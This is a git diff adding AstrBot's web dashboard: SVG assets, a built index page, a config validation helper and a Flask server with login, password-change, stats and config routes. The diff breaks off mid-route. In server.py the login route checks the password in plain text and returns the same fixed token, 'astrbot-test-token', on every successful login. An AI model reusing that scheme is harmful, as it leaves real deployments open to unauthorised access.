<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 577.459 251.827)" stroke="black"/>
|
||||
<path d="M263.231 346.905L601.064 151.871" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 600.973 238.252)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 286.654 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 624.487 224.677)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 310.169 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 648.002 211.102)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 333.683 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 671.516 197.527)" stroke="black"/>
|
||||
</g>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.9 KiB |
43
dashboard/dist/assets/img-error-blue-2675a7a9.svg
vendored
Normal file
@@ -0,0 +1,43 @@
|
||||
<svg width="676" height="395" viewBox="0 0 676 395" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 361.873 290.126)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364.249 291.115)" fill="#90CAF9"/>
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 291.67 86.4912)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 294.046 87.48)" fill="#90CAF9"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M370.694 211.828L365.394 208.768V215.835L365.404 215.829C365.459 216.281 365.785 216.724 366.383 217.069L417.03 246.308C418.347 247.068 420.481 247.068 421.798 246.308L468.671 219.248C469.374 218.842 469.702 218.301 469.654 217.77V210.861L464.282 213.962L418.024 187.257C416.708 186.497 414.573 186.497 413.257 187.257L370.694 211.828Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="#90CAF9"/>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="url(#paint1_linear)"/>
|
||||
<rect width="56.6816" height="60.8238" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 366.645 208.761)" fill="url(#paint2_linear)"/>
|
||||
<path d="M421.238 206.161C421.238 206.434 421.62 206.655 422.092 206.655L432.159 206.656C435.164 206.656 437.6 208.063 437.601 209.798C437.602 211.533 435.166 212.939 432.162 212.938L422.09 212.937C421.62 212.937 421.24 213.157 421.24 213.428L421.241 215.814C421.241 216.087 421.624 216.308 422.096 216.308L432.689 216.309C438.917 216.31 443.967 213.395 443.965 209.799C443.964 206.202 438.914 203.286 432.684 203.286L422.086 203.284C421.617 203.284 421.236 203.504 421.237 203.775L421.238 206.161Z" fill="#1E88E5"/>
|
||||
<path d="M413.422 213.43C413.422 213.157 413.039 212.936 412.567 212.936L402.896 212.935C399.891 212.935 397.455 211.528 397.454 209.793C397.453 208.059 399.889 206.652 402.894 206.653L412.57 206.654C413.039 206.654 413.419 206.435 413.419 206.164L413.418 203.777C413.418 203.504 413.035 203.283 412.563 203.283L402.366 203.282C396.138 203.281 391.089 206.197 391.09 209.793C391.091 213.389 396.141 216.305 402.371 216.306L412.573 216.307C413.042 216.307 413.423 216.088 413.423 215.817L413.422 213.43Z" fill="#1E88E5"/>
|
||||
<path d="M407.999 198.145L411.211 201.235C411.266 201.288 411.332 201.336 411.405 201.379C411.813 201.614 412.461 201.669 412.979 201.49C413.59 201.278 413.787 200.821 413.421 200.469L410.209 197.379C409.843 197.027 409.051 196.913 408.441 197.124C407.831 197.335 407.633 197.793 407.999 198.145Z" fill="#1E88E5"/>
|
||||
<path d="M416.235 200.853C416.235 201.058 416.38 201.244 416.613 201.379C416.846 201.513 417.168 201.597 417.524 201.597C418.236 201.596 418.813 201.263 418.813 200.852L418.812 197.021C418.811 196.61 418.234 196.277 417.522 196.277C416.811 196.278 416.234 196.611 416.234 197.022L416.235 200.853Z" fill="#1E88E5"/>
|
||||
<path d="M421.627 200.47C421.317 200.769 421.412 201.143 421.82 201.379C421.893 201.421 421.977 201.459 422.069 201.491C422.68 201.703 423.472 201.588 423.838 201.236L427.047 198.147C427.413 197.794 427.215 197.337 426.605 197.126C425.994 196.915 425.203 197.029 424.836 197.381L421.627 200.47Z" fill="#1E88E5"/>
|
||||
<path d="M427.056 221.447L423.844 218.357C423.478 218.005 422.686 217.891 422.076 218.102C421.466 218.314 421.268 218.771 421.634 219.123L424.846 222.213C424.901 222.266 424.967 222.314 425.04 222.357C425.448 222.592 426.097 222.647 426.614 222.468C427.225 222.257 427.423 221.799 427.056 221.447Z" fill="#1E88E5"/>
|
||||
<path d="M418.82 218.739C418.82 218.328 418.243 217.995 417.531 217.995C416.819 217.995 416.242 218.329 416.242 218.74L416.243 222.57C416.244 222.776 416.388 222.962 416.621 223.096C416.854 223.231 417.177 223.314 417.533 223.314C418.245 223.314 418.822 222.981 418.821 222.57L418.82 218.739Z" fill="#1E88E5"/>
|
||||
<path d="M413.428 219.122C413.794 218.77 413.596 218.312 412.986 218.101C412.375 217.89 411.584 218.004 411.217 218.356L408.008 221.445C407.698 221.744 407.793 222.118 408.201 222.354C408.274 222.396 408.358 222.434 408.45 222.466C409.061 222.678 409.853 222.563 410.219 222.211L413.428 219.122Z" fill="#1E88E5"/>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="301.394" y="186.687" width="232.264" height="208.191" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.129412 0 0 0 0 0.588235 0 0 0 0 0.952941 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="417.526" y1="205.789" x2="365.394" y2="216.782" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2196F3"/>
|
||||
<stop offset="1" stop-color="#B1DCFF"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="0.503035" y1="2.68177" x2="20.3032" y2="42.2842" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-18.5494" y1="-44.8799" x2="14.7845" y2="40.5766" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 5.5 KiB |
42
dashboard/dist/assets/img-error-purple-edee3fbc.svg
vendored
Normal file
@@ -0,0 +1,42 @@
|
||||
<svg width="710" height="391" viewBox="0 0 710 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 161.088 154.333)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 162.809 155.327)" fill="#B39DDB"/>
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 536.744 181.299)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 538.465 182.292)" fill="#B39DDB"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M67.7237 137.573V134.673H64.009V140.824L64.0177 140.829C64.0367 141.477 64.4743 142.121 65.3305 142.615L103.641 164.733C105.393 165.744 108.232 165.744 109.983 164.733L204.044 110.431C204.879 109.949 205.316 109.324 205.355 108.693L205.355 108.692V108.68C205.358 108.628 205.358 108.576 205.355 108.523L205.362 102.335L200.065 104.472L165.733 84.6523C163.982 83.6413 161.142 83.6413 159.391 84.6523L67.7237 137.573Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="url(#paint1_linear)" fill-opacity="0.3"/>
|
||||
<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask0)">
|
||||
</g>
|
||||
<mask id="mask1" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask1)">
|
||||
<rect width="64.3732" height="64.3732" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 111.303 81.6006)" fill="#5E35B1"/>
|
||||
<rect opacity="0.7" x="0.866041" width="63.3732" height="63.3732" rx="4.5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 79.1848 87.8305)" stroke="#5E35B1"/>
|
||||
</g>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="0.0090332" y="83.894" width="269.353" height="229.597" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.403922 0 0 0 0 0.227451 0 0 0 0 0.717647 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="200.346" y1="102.359" x2="71.0293" y2="158.071" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#A491C8"/>
|
||||
<stop offset="1" stop-color="#D7C5F8"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="8.1531" y1="-0.145767" x2="57.1962" y2="72.3003" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.3 KiB |
27
dashboard/dist/assets/img-error-text-a6aebfa0.svg
vendored
Normal file
@@ -0,0 +1,27 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M267.744 237.142L279.699 230.24L300.636 242.329L288.682 249.231L313.566 263.598L286.344 279.314L261.46 264.947L215.984 291.203L197.779 282.558L169.334 211.758L169.092 211.618L196.313 195.902L267.744 237.142ZM219.359 265.077L240.523 252.859L204.445 232.029L205.487 234.589L219.359 265.077Z" fill="#FFAB91"/>
|
||||
<path d="M469.959 120.206L481.913 113.304L502.851 125.392L490.897 132.294L515.78 146.661L488.559 162.377L463.675 148.011L418.199 174.266L399.994 165.621L371.548 94.8211L371.307 94.6816L398.528 78.9654L469.959 120.206ZM421.574 148.141L442.737 135.922L406.66 115.093L407.701 117.653L421.574 148.141Z" fill="#FFAB91"/>
|
||||
<path d="M204.523 235.027V232.237L219.401 265.014L240.555 252.926V255.018L218.936 267.339L204.523 235.027Z" fill="#D84315"/>
|
||||
<path d="M406.738 118.09V115.301L421.616 148.078L442.77 135.99V138.082L421.151 150.402L406.738 118.09Z" fill="#D84315"/>
|
||||
<rect width="109.114" height="136.405" transform="matrix(0.866025 -0.5 0.866025 0.5 220.507 181.925)" fill="url(#paint0_linear)"/>
|
||||
<rect width="40.2357" height="70.0545" transform="matrix(0.866025 -0.5 0.866025 0.5 280.437 201.886)" fill="url(#paint1_linear)"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="#1565C0" stroke-width="29"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="url(#paint2_linear)" stroke-width="29"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M279.517 230.177L267.662 237.15L196.064 195.772L168.866 211.58L169.331 212.097L170.096 214.002L196.436 198.795L267.866 240.035L279.821 233.133L298.211 243.751L300.787 242.265L279.517 230.177ZM291.278 250.695L288.804 252.124L311.1 264.996L313.805 263.418L291.278 250.695Z" fill="#D84315"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M481.732 113.24L469.877 120.214L398.279 78.8359L371.081 94.6433L371.546 95.1603L372.311 97.0652L398.651 81.8581L470.081 123.099L482.036 116.196L500.426 126.814L503.002 125.328L481.732 113.24ZM493.493 133.759L491.019 135.187L513.315 148.06L516.02 146.482L493.493 133.759Z" fill="#D84315"/>
|
||||
<path d="M288.674 252.229V249.207L291.929 251.067L288.674 252.229Z" fill="#D84315"/>
|
||||
<defs>
|
||||
<linearGradient id="paint0_linear" x1="77.7511" y1="139.902" x2="-10.8629" y2="8.75671" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#3076C8"/>
|
||||
<stop offset="0.992076" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="25.8162" y1="51.0447" x2="68.7073" y2="-5.41524" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2E75C7"/>
|
||||
<stop offset="1" stop-color="#4283CC"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-16.1224" y1="-47.972" x2="123.494" y2="290.853" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 2.9 KiB |
5
dashboard/dist/assets/index-0f1523f3.css
vendored
Normal file
720
dashboard/dist/assets/index-25639696.js
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-67d24abe.eot
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-80bb28b3.woff
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-a58ecb54.ttf
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-c1c004a9.woff2
vendored
Normal file
9
dashboard/dist/assets/md5-0b0a2337.js
vendored
Normal file
6
dashboard/dist/assets/social-google-a359a253.svg
vendored
Normal file
@@ -0,0 +1,6 @@
|
||||
<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M5.06129 13.2253L4.31871 15.9975L1.60458 16.0549C0.793457 14.5504 0.333374 12.8292 0.333374 11C0.333374 9.23119 0.763541 7.56319 1.52604 6.09448H1.52662L3.94296 6.53748L5.00146 8.93932C4.77992 9.58519 4.65917 10.2785 4.65917 11C4.65925 11.783 4.80108 12.5332 5.06129 13.2253Z" fill="#FBBB00"/>
|
||||
<path d="M21.4804 9.00732C21.6029 9.65257 21.6668 10.3189 21.6668 11C21.6668 11.7637 21.5865 12.5086 21.4335 13.2271C20.9143 15.6722 19.5575 17.8073 17.678 19.3182L17.6774 19.3177L14.6339 19.1624L14.2031 16.4734C15.4503 15.742 16.425 14.5974 16.9384 13.2271H11.2346V9.00732H17.0216H21.4804Z" fill="#518EF8"/>
|
||||
<path d="M17.6772 19.3176L17.6777 19.3182C15.8498 20.7875 13.5277 21.6666 11 21.6666C6.93783 21.6666 3.40612 19.3962 1.60449 16.0549L5.0612 13.2253C5.96199 15.6294 8.28112 17.3408 11 17.3408C12.1686 17.3408 13.2634 17.0249 14.2029 16.4734L17.6772 19.3176Z" fill="#28B446"/>
|
||||
<path d="M17.8085 2.78892L14.353 5.61792C13.3807 5.01017 12.2313 4.65908 11 4.65908C8.21963 4.65908 5.85713 6.44896 5.00146 8.93925L1.52658 6.09442H1.526C3.30125 2.67171 6.8775 0.333252 11 0.333252C13.5881 0.333252 15.9612 1.25517 17.8085 2.78892Z" fill="#F14336"/>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 1.2 KiB |
1
dashboard/dist/favicon.svg
vendored
Normal file
@@ -0,0 +1 @@
|
||||
<svg t="1702013028016" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1541" width="200" height="200"><path d="M0 0m204.8 0l614.4 0q204.8 0 204.8 204.8l0 614.4q0 204.8-204.8 204.8l-614.4 0q-204.8 0-204.8-204.8l0-614.4q0-204.8 204.8-204.8Z" fill="#FFEC9C" p-id="1542"></path><path d="M819.2 0H534.272A756.48 756.48 0 0 0 0 483.584V819.2a204.8 204.8 0 0 0 204.8 204.8h614.4a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE98A" p-id="1543"></path><path d="M819.2 0h-3.84a755.2 755.2 0 0 0-539.392 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE471" p-id="1544"></path><path d="M497.152 721.152A752.384 752.384 0 0 0 560.384 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-89.088-168.96 755.2 755.2 0 0 0-437.76 685.312z" fill="#FFE161" p-id="1545"></path><path d="M526.08 140.032l98.304 199.168L844.8 371.2a15.616 15.616 0 0 1 8.704 25.6l-159.744 156.16 37.632 219.136a15.616 15.616 0 0 1-22.528 16.384l-196.608-102.4-196.608 102.4a15.616 15.616 0 0 1-22.528-16.384l37.12-219.136-159.232-155.136a15.616 15.616 0 0 1 8.704-25.6l219.904-32 98.304-199.168a15.616 15.616 0 0 1 28.16-1.024z" fill="#FFF5CC" p-id="1546"></path><path d="M665.6 409.6a444.16 444.16 0 0 0 25.6-61.44l-65.536-9.472-99.584-198.656a15.616 15.616 0 0 0-27.904 0l-98.304 199.168L179.2 371.2a15.616 15.616 0 0 0-8.704 25.6l159.744 156.16-15.104 87.04A407.808 407.808 0 0 0 665.6 409.6z" fill="#FFFFFF" p-id="1547"></path></svg>
|
||||
|
After Width: | Height: | Size: 1.5 KiB |
21
dashboard/dist/index.html
vendored
Normal file
@@ -0,0 +1,21 @@
|
||||
<!doctype html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<link rel="icon" href="/favicon.svg" />
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<meta name="keywords" content="AstrBot Soulter" />
|
||||
<meta name="description" content="AstrBot Dashboard" />
|
||||
<link
|
||||
rel="stylesheet"
|
||||
href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Poppins:wght@400;500;600;700&family=Roboto:wght@400;500;700&display=swap"
|
||||
/>
|
||||
<title>AstrBot - 仪表盘</title>
|
||||
<script type="module" crossorigin src="/assets/index-25639696.js"></script>
|
||||
<link rel="stylesheet" href="/assets/index-0f1523f3.css">
|
||||
</head>
|
||||
<body>
|
||||
<div id="app"></div>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
92
dashboard/helper.py
Normal file
@@ -0,0 +1,92 @@
|
||||
from . import DashBoardData
|
||||
from util.cmd_config import AstrBotConfig
|
||||
from dataclasses import dataclass, asdict
|
||||
from util.plugin_dev.api.v1.config import update_config
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from type.types import Context
|
||||
from type.config import CONFIG_METADATA_2
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class DashBoardHelper():
|
||||
def __init__(self, context: Context):
|
||||
self.context = context
|
||||
self.config_key_dont_show = ['dashboard', 'config_version']
|
||||
|
||||
def try_cast(self, value: str, type_: str):
|
||||
if type_ == "int" and value.isdigit():
|
||||
return int(value)
|
||||
elif type_ == "float" and isinstance(value, str) \
|
||||
and value.replace(".", "", 1).isdigit():
|
||||
return float(value)
|
||||
elif type_ == "float" and isinstance(value, int):
|
||||
return float(value)
|
||||
|
||||
|
||||
def validate_config(self, data):
|
||||
errors = []
|
||||
def validate(data, metadata=CONFIG_METADATA_2, path=""):
|
||||
for key, meta in metadata.items():
|
||||
if key not in data:
|
||||
continue
|
||||
value = data[key]
|
||||
# 递归验证
|
||||
if meta["type"] == "list" and isinstance(value, list):
|
||||
for item in value:
|
||||
validate(item, meta["items"], path=f"{path}{key}.")
|
||||
elif meta["type"] == "object" and isinstance(value, dict):
|
||||
validate(value, meta["items"], path=f"{path}{key}.")
|
||||
|
||||
if meta["type"] == "int" and not isinstance(value, int):
|
||||
casted = self.try_cast(value, "int")
|
||||
if casted is None:
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 int, 得到了 {type(value).__name__}")
|
||||
data[key] = casted
|
||||
elif meta["type"] == "float" and not isinstance(value, float):
|
||||
casted = self.try_cast(value, "float")
|
||||
if casted is None:
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 float, 得到了 {type(value).__name__}")
|
||||
data[key] = casted
|
||||
elif meta["type"] == "bool" and not isinstance(value, bool):
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 bool, 得到了 {type(value).__name__}")
|
||||
elif meta["type"] == "string" and not isinstance(value, str):
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 string, 得到了 {type(value).__name__}")
|
||||
elif meta["type"] == "list" and not isinstance(value, list):
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 list, 得到了 {type(value).__name__}")
|
||||
elif meta["type"] == "object" and not isinstance(value, dict):
|
||||
errors.append(f"错误的类型 {path}{key}: 期望是 dict, 得到了 {type(value).__name__}")
|
||||
validate(value, meta["items"], path=f"{path}{key}.")
|
||||
validate(data)
|
||||
|
||||
# hardcode warning
|
||||
data['config_version'] = self.context.config_helper.config_version
|
||||
data['dashboard'] = asdict(self.context.config_helper.dashboard)
|
||||
|
||||
return errors
|
||||
|
||||
def save_astrbot_config(self, post_config: dict):
|
||||
'''验证并保存配置'''
|
||||
errors = self.validate_config(post_config)
|
||||
if errors:
|
||||
raise ValueError(f"格式校验未通过: {errors}")
|
||||
self.context.config_helper.flush_config(post_config)
|
||||
|
||||
def save_extension_config(self, post_config: dict):
|
||||
if 'namespace' not in post_config:
|
||||
raise ValueError("Missing key: namespace")
|
||||
if 'config' not in post_config:
|
||||
raise ValueError("Missing key: config")
|
||||
|
||||
namespace = post_config['namespace']
|
||||
config: list = post_config['config'][0]['body']
|
||||
for item in config:
|
||||
key = item['path']
|
||||
value = item['value']
|
||||
typ = item['val_type']
|
||||
if typ == 'int':
|
||||
if not value.isdigit():
|
||||
raise ValueError(f"错误的类型 {namespace}.{key}: 期望是 int, 得到了 {type(value).__name__}")
|
||||
value = int(value)
|
||||
update_config(namespace, key, value)
|
||||
463
dashboard/server.py
Normal file
@@ -0,0 +1,463 @@
|
||||
import websockets
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import os
|
||||
import uuid
|
||||
import logging
|
||||
import traceback
|
||||
|
||||
from . import DashBoardData, Response
|
||||
from flask import Flask, request
|
||||
from werkzeug.serving import make_server
|
||||
from astrbot.persist.helper import dbConn
|
||||
from type.types import Context
|
||||
from typing import List
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from dashboard.helper import DashBoardHelper
|
||||
from util.io import get_local_ip_addresses
|
||||
from model.plugin.manager import PluginManager
|
||||
from util.updator.astrbot_updator import AstrBotUpdator
|
||||
from type.config import CONFIG_METADATA_2
|
||||
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class AstrBotDashBoard():
|
||||
def __init__(self, context: Context, plugin_manager: PluginManager, astrbot_updator: AstrBotUpdator):
|
||||
self.context = context
|
||||
self.plugin_manager = plugin_manager
|
||||
self.astrbot_updator = astrbot_updator
|
||||
self.dashboard_data = DashBoardData()
|
||||
self.dashboard_helper = DashBoardHelper(self.context)
|
||||
|
||||
self.dashboard_be = Flask(__name__, static_folder="dist", static_url_path="/")
|
||||
self.dashboard_be.json.sort_keys=False # 不按照字典排序
|
||||
logging.getLogger('werkzeug').setLevel(logging.ERROR)
|
||||
self.dashboard_be.logger.setLevel(logging.ERROR)
|
||||
|
||||
self.ws_clients = {} # remote_ip: ws
|
||||
self.loop = asyncio.get_event_loop()
|
||||
|
||||
self.http_server_thread: threading.Thread = None
|
||||
|
||||
@self.dashboard_be.get("/")
|
||||
def index():
|
||||
# 返回页面
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/auth/login")
|
||||
def _():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/config")
|
||||
def rt_config():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/logs")
|
||||
def rt_logs():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/extension")
|
||||
def rt_extension():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/dashboard/default")
|
||||
def rt_dashboard():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.post("/api/authenticate")
|
||||
def authenticate():
|
||||
username = self.context.config_helper.dashboard.username
|
||||
password = self.context.config_helper.dashboard.password
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["username"] == username and post_data["password"] == password:
|
||||
return Response(
|
||||
status="success",
|
||||
message="登录成功。",
|
||||
data={
|
||||
"token": "astrbot-test-token",
|
||||
"username": username
|
||||
}
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="用户名或密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/change_password")
|
||||
def change_password():
|
||||
password = self.context.config_helper.dashboard.password
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["password"] == password:
|
||||
self.context.config_helper.dashboard.password = post_data['new_password']
|
||||
return Response(
|
||||
status="success",
|
||||
message="修改成功。",
|
||||
data=None
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="原密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/stats")
|
||||
def get_stats():
|
||||
db_inst = dbConn()
|
||||
all_session = db_inst.get_all_stat_session()
|
||||
last_24_message = db_inst.get_last_24h_stat_message()
|
||||
# last_24_platform = db_inst.get_last_24h_stat_platform()
|
||||
platforms = db_inst.get_platform_cnt_total()
|
||||
self.dashboard_data.stats["session"] = []
|
||||
self.dashboard_data.stats["session_total"] = db_inst.get_session_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["message"] = last_24_message
|
||||
self.dashboard_data.stats["message_total"] = db_inst.get_message_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["platform"] = platforms
|
||||
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self.dashboard_data.stats
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/configs")
|
||||
def get_configs():
|
||||
# namespace 为空时返回 AstrBot 配置
|
||||
# 否则返回指定 namespace 的插件配置
|
||||
namespace = "" if "namespace" not in request.args else request.args["namespace"]
|
||||
if not namespace:
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self._get_astrbot_config()
|
||||
).__dict__
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self._get_extension_config(namespace)
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/astrbot-configs")
|
||||
def post_astrbot_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.save_astrbot_configs(post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
